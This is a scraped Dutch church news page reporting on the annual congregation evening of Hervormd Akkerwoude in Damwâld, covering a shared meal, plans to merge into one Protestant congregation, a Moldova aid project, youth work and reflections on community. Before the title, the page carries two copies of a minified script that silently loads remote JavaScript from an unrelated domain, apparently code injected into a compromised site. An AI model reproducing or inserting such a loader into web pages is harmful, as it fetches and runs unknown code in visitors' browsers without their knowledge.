;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Heerlijke gemeenteavond Hervormd Akkerwoude! - PKN Damwâld

Heerlijke gemeenteavond Hervormd Akkerwoude!

Gepubliceerd op: donderdag 17 november 2022

It Skûlplak bleek afgelopen woensdagavond weer een ouderwetse ontmoetingsplaats voor gemeenteleden van Hervormd Akkerwoude. Op het programma stond de jaarlijkse gemeenteavond. Als ‘lokker’ had de kerkenraad gekozen voor een heerlijke start … een gezamenlijke maaltijd! Dé manier om het nuttige met het aangename te verenigen. Verbinding zoeken met iedereen, juist ook jongeren en jonge gezinnen. Elkaar ontmoeten, samen eten en elkaar bijpraten is belangrijk, een gesprek over kerkzaken is dat ook. Het officiële gedeelte van de gemeenteavond werd dan bepaald ook geen saaie zit. Er stonden dan ook belangwekkende bespreekpunten op de agenda, zoals de route naar één protestantse gemeente in Damwâld, de deelname aan het diaconale project Kerk in Actie voor Moldavië,  het dynamische jeugdwerk, de maatschappelijke ontwikkelingen en de gevolgen daarvan voor ons als kerk en uiteraard een boeiende blik op ons wel en wee.

Onze gemeente telt (te) weinig kerkeraadsleden, maar veel vrijwilligers, met grote en kleine taken. Zij zetten zich voortdurend belangeloos in voor allerlei aspecten van onze kerkgemeenschap. Dat stemt tot dankbaarheid. Het vele werk voor en in de gemeente vraagt volop aandacht, en misschien ook wel meer dan wij eraan kunnen geven. Zaken als pastoraat, jeugdwerk, kerkrentmeesterschap, diaconie, het verdere proces van samengaan, de coördinatie van de activiteiten die behoren bij het willen zijn van een zichtbare en betekenisvolle kerk in het dorp, ze vragen veel aandacht. Voor het gevoel is het zeker in deze tijd van crisis, eenzaamheid, verharding en tweedeling vaak lastig vast te houden dat we deel uit maken van een geloofsgemeenschap. We leven allemaal in onze eigen ‘bubbel’ en het lukt steeds minder om elkaar in het oog te houden. Alleen op sleutelmomenten ontmoet je de ander die je lang niet hebt gezien. De kerk, de kerkelijke gemeente, is daarmee  dan ook onmisbaar. Want draait het  in de kerk niet om de ontmoeting met God en met elkaar? Mensen maken tijd om elkaar te ontmoeten, te helpen en gesprekken te voeren, soms heel vertrouwelijk. Tal van activiteiten brengt die verbinding tussen mensen tot stand. In verbinding met elkaar kan gepraat worden over wat ons bezighoudt en delen we onze ervaringen, ons leven. Zo bieden we elkaar troost, als dat nodig is, maar er kan ook genoten worden van de goede kanten van het leven.

Mogen we geïnspireerd door ontmoeting en verbinding de toekomst ingaan met aandacht voor elkaar en vanuit Gods liefde. Samen vieren, samen organiseren, samen zorgen, het ligt allemaal dicht bij elkaar!